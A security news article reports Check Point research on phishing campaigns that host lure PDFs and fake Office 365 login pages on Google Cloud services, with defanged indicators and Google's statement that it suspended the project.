Fraudsters looking to collect login details are increasingly turning to public cloud services to host lure documents and phishing pages, making it more difficult for targets to detect the attack.
The trend has gained traction among cybercriminals, who rely on multiple cloud services to host phishing landing pages and the lure documents redirecting to them.
Sneaky tactics
In a campaign this year, fraudsters set up a clever scenario that involves multiple legitimate elements to hide the theft of Office 365 credentials.
Researchers at Check Point describe in a report today that the attackers relied on Google Drive to host a malicious PDF document and Google’s “storage.googleapis[.]com” to host the phishing page.
Google’s cloud services are not the only ones abused this way. BleepingComputer analyzed a recent phishing campaign that used Microsoft Azure, Microsoft Dynamics, and IBM Cloud.
The PDF spotted by Check Point was made to look like a gateway to content available through SharePoint web-based collaborative platform.
Once the potential victim takes the bait and follows the Access Document link, the phishing page hosted in Google Cloud Platform loads asking to log in using Office 365 credentials or an organization’s ID.
Regardless of the selected option, an Outlook login pop-up window launches to complete the alleged login process and provide access to the requested document.
Check Point highlights that victims are unlikely to spot the scam since the pages load from legitimate sources and at the end of the process a genuine PDF document from a reputable company is delivered.
Looking at the source code, though, reveals that the resources for the landing pages are loaded from a third-party location, “prvtsmtp[.]com.”
While this trick still leaves the door open for detection, a newer one observed in recent attacks may leave the victims clueless of the phishing attack.
According to the researchers, attackers started using Google’s Cloud Functions service, which allows running code in the cloud. This tactic allows loading the resources for the phishing page without revealing the attacker’s domain.
“Investigating prvtsmtp[.]com showed that it resolved to a Ukrainian IP address (31.28.168[.]4). Many other domains related to this phishing attack resolved to the same IP address, or different ones on the same netblock” - Check Point
This detail allows researchers to trace this particular attacker’s activity to 2018 when they hosted the phishing pages directly on a malicious website. Next, they switched to Azure Storage before moving to Google Cloud.
The hacker project hosting the malicious files is no longer active. Google suspended it back in January and the URL died with it. "Google investigates and suspends phishing pages when we become aware of them through Safe Browsing data feeds and other direct reports."
Source: Paper.li